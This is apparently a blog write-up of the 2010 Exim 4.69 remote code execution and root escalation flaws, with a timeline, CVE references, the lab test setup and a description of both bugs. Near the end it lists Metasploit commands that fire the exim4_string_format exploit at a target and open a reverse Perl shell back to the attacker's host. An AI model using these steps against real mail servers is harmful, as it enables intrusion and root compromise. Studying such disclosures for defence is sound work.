exim 4.69 remote code execution

Timeline :

Vulnerability discovered the 2010-12-07 by Sergey Kononenko
Vulnerability confirmed the 2010-12-10 by David Woodhouse
Exploit released the 2010-12-10 by hdm & jduck
Vulnerability corrected the 2008-12-02 but neither identified as a vulnerability since 2 years ! So not ported in most OS distributions.

    PoC provided by :

Sergey Kononenko
David Woodhouse
jduck
hdm

    Reference(s) :

CVE-2010-4345
CVE-2010-4344
OSVDB-69685

    Affected version(s) :

Version before and equal to 4.69, depending on the distrib versioning

    Tested on Debian Lenny 5.0 with :

    exim4-base_4.69-9_i386.deb
    exim4-config_4.69-9_all.deb
    exim4-daemon-light_4.69-9_i386.deb
    exim4_4.69-9_all.deb

    dpkg -l | grep exim4

    Description :

Two vulnerabilities, exploited since two years, have been discovered into the Exim MTA. Sergey Kononenko, employee of a Ukrainian company, following a hack of its IT infrastructure, unwittingly discovered a vulnerability in the mail server Exim4, which was exploitable for two years!
This vulnerability has been reported, on December 7, to the Exim maintainers, and the rumor quickly spread up. It will not take more than three days for Rapid7 researchers, authors of the Metasploit pen-testing framework, to develop a valid PoC that affects most Exim installations on all platforms (Debian, Ubuntu, Red Hat, Centos, etc..).
Share the same time, not one but two vulnerabilities have been discovered. The first, CVE-2010-4344, will permit a remote arbitrary code execution with the privileges of the user invoking the Exim mail software. The second, CVE-2010-4345, for its part, allows escalation of privileges from the user invoking the Exim mail software to super user root.
It is interesting to see that the first vulnerability was corrected December 2, 2008, but this correction had not been marked as a correction of vulnerability. This lack of communication has resulted that the distributions (Debian, Ubuntu, Red Hat, CentOS, etc.) providing Exim were not warned of the vulnerability, and therefore updating of the hidden vulnerability never been done until now.

    Commands :

dpkg -l | grep exim4
tail -f /var/log/exim4/mainlog

use exploit/unix/smtp/exim4_string_format
set RHOST 192.168.178.52
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit
id

1 thought on “exim 4.69 remote code execution

  1. Do this exploit must be done locally? i mean on the same network? I ask because of thoes ips! 192.168.172.* . Can i use this exploit via internet?

    Thanks and sorry. Im newbie

Comments are closed.